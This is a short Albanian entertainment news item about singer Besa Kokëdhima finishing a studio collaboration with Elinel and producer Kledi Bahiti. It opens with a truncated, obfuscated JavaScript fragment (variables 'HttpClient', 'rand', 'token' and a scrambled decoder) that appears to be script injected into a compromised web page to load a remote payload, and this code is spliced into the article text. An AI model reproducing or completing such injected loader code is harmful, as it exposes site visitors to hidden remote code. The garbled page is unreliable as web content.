;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ku e zuri mesnata Besa Kokëdhimën?!

By

Ka pak kohë që ka publikuar projektin e ri solo të titulluar ‘Kokëfortë’ por Besa Kokëdhima nuk e ka në plan të ndalet.

Në mesin e një vrulli të angazhimeve që përfshijnë edhe pjesëmarrjen e saj në spektaklin ‘The Voice’, këngëtarja e njohur po gjen kohë edhe për punë në projekte të reja.

Tash e një kohë ajo ka paralajmëruar bashkëpunimin ‘Mos m’le me ra’ me Elinelin për muajin Prill dhe duket që do ta mbajë fjalën.

Në punë intenzive, në studion e Threedots këngëtarja po punon në finalizmin e këtij projekti në mënyrë që gjithçka të përfundojë sipas planit të paraparë.

E duket se Besa nuk po kursehet as të qëndrojë deri në orët e vona në studion e Threedots ku bashkë me producentin Kledi Bahiti po përpiqet të nxjerrë më të mirën nga ky krijim muzikor i cili do jetë gati për pak ditë.

Puna e madhe shpaguhet dhe këtë duket që Besa po e ka shumë parasys! /prive.al

 

Artikuj të ngjashëm